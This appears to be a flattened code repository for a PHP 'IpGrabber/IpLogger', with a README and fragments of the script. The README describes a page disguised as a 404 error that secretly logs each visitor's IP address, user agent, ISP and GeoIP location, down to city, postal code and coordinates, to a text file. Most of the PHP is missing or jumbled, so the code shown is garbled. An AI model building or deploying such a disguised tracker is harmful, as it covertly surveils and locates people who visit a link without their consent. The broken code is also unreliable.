Server Error
63 |Page Not Found
65 |This page either doesn't exist, or it moved somewhere else.
66 |67 |
├── info.txt ├── README.md └── ipgrabber.php /info.txt: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # IpGrabber / IpLogger 2 | I've scrive and IpGrabber ( IpLogger ), in PHP language, hidden with an 404 ERROR page ( html/css ). 3 | This script is using [Geoip php extension](https://secure.php.net/manual/en/book.geoip.php), so active it on your webhost ! 4 | 5 |  6 | 7 | Data grabbed : 8 | ``` 9 | ----------------- 10 | Ip Adress : 11 | User Agent : 12 | 25-11-2018 21:11:41 13 | FAI : 14 | continent_code: 15 | country_code: 16 | country_code3: 17 | country_name: 18 | region: 19 | city: 20 | postal_code: 21 | latitude: 22 | longitude: 23 | dma_code: 24 | area_code: 25 | ----------------- 26 | ``` 27 | 28 | 29 | ## How it works ? 30 | The user just need to go on your page, his ip and a lot of anothers user infos are gonna be scrived into an info.txt 31 | 32 | 33 | -------------------------------------------------------------------------------- /ipgrabber.php: -------------------------------------------------------------------------------- 1 | $value) 19 | { 20 | fputs($stockInfo, $i . ': ' . $value . "\r\n"); 21 | } 22 | fputs($stockInfo,'-----------------' . "\r\n"); 23 | fclose($stockInfo); 24 | ?> 25 | 26 | 27 | 28 |
29 | 30 | 31 | 32 |This page either doesn't exist, or it moved somewhere else.
66 |